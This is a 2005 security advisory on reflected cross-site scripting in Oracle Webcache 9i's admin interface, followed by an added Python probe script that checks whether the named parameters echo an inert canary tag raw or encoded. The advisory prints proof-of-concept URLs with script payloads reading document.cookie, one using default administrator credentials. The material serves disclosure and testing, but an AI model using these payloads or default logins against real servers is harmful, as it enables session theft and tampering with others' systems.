Cross Site Scripting in Oracle Webcache 9i

2005-04-28 00:00:00
Source: vulners.com

Name Cross Site Scripting in Oracle Webcache 9i
Systems Affected Oracle Application Server with Webcache 9i
Severity Low Risk
Category Cross Site Scripting
Vendor URL http://www.oracle.com
Author Alexander Kornbrust (ak at red-database-security.com)
Date 26 Apr 2005 (V 1.00)
Advisory AKSEC2003-011
Time to fix ?? days

Details
Many parameters of the Webcache administration interface (webcacheadmin, port 4000 by default) are vulnerable to cross-site scripting (XSS) attacks: user-supplied values are echoed into the HTML response without being encoded. Combined with the file-writing functions these screens expose, the bug can be used to corrupt an Oracle Application Server installation.

Example
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2
http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>
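The following script is an added example and is not code from the Red-Database-Security advisory or from Oracle. It turns the PoC URLs above into a reproducible check: an inert canary tag is appended to the reflected parameter in place of <script>alert(document.cookie)</script>, and the response body is classified by whether the canary comes back raw (still vulnerable), HTML-encoded (output encoding in place) or not at all. The host and port are taken from the advisory's URLs; the credentials parameter, the fetcher signature and the two sample response bodies are assumptions constructed for offline use.

```python
# Added example (not the advisory's or Oracle's code): reflected-XSS probe for the
# webcacheadmin parameters named in AKSEC2003-011. Host/port from the advisory's
# URLs; sample responses below are constructed, not captured from a real server.
import base64
import html
import urllib.parse
import urllib.request

BASE_URL = "http://server01:4000/webcacheadmin"  # assumed, as in the advisory's examples
CANARY = "<xsschk>"  # inert tag: never executes, trivially recognisable in a response

# Parameter sets from the advisory; the first tuple element is the parameter that reflects.
PROBES = [
    ("cache_dump_file", {"SCREEN_ID": "CGA.CacheDump", "ACTION": "Submit",
                         "index": "1", "cache_dump_file": "/tmp/create_or_replace_file.txt"}),
    ("PartialPageErrorPage", {"SCREEN_ID": "CGA.Site.ApologyPages_Edit", "ACTION": "Submit",
                              "PartialPageErrorPage": "/inservice.html", "site_id": "2"}),
]


def build_probe_url(reflected_param, params, canary=CANARY, base=BASE_URL):
    """Append the canary to the reflected parameter, mirroring the advisory's PoC URLs."""
    probe = dict(params)
    probe[reflected_param] = probe[reflected_param] + canary
    return base + "?" + urllib.parse.urlencode(probe)


def classify(body, canary=CANARY):
    """'vulnerable' if the canary is echoed verbatim, 'escaped' if only its
    HTML-encoded form (&lt;xsschk&gt;) appears, 'not reflected' otherwise."""
    if canary in body:
        return "vulnerable"
    if html.escape(canary) in body:
        return "escaped"
    return "not reflected"


def fetch(url, username=None, password=None, timeout=10):
    """Fetch a probe URL with optional HTTP basic auth (the advisory's third URL
    embeds administrator:administrator). Only used against a live host."""
    req = urllib.request.Request(url)
    if username is not None:
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe_all(fetcher, probes=PROBES):
    """Run every probe through fetcher(url) -> body and return {param: verdict}.
    Pass fetch (wrapped with credentials) for a live host, or a lambda returning
    a canned body to exercise the logic offline."""
    return {param: classify(fetcher(build_probe_url(param, params))) for param, params in probes}


def render_safely(value):
    """What the admin screens should do before echoing input: HTML-encode it."""
    return html.escape(value, quote=True)


# Constructed sample responses: one echoing the value raw, one after output encoding.
VULNERABLE_BODY = ("<html><body>Cache dump written to /tmp/create_or_replace_file.txt"
                   + CANARY + "</body></html>")
FIXED_BODY = ("<html><body>Cache dump written to "
              + render_safely("/tmp/create_or_replace_file.txt" + CANARY) + "</body></html>")


if __name__ == "__main__":
    for param, verdict in probe_all(lambda url: VULNERABLE_BODY).items():
        print(f"{param}: {verdict}")
    print("after output encoding:", classify(FIXED_BODY))
```

Against a live installation, wrap fetch with the admin credentials (for example `probe_all(lambda u: fetch(u, "administrator", "administrator"))`) and expect "escaped" or "not reflected" on a patched server; "vulnerable" means the parameter still echoes raw HTML.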

Patch Information
Oracle fixed these issues without informing me or their customers.

History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory

© 2005 by Red-Database-Security GmbH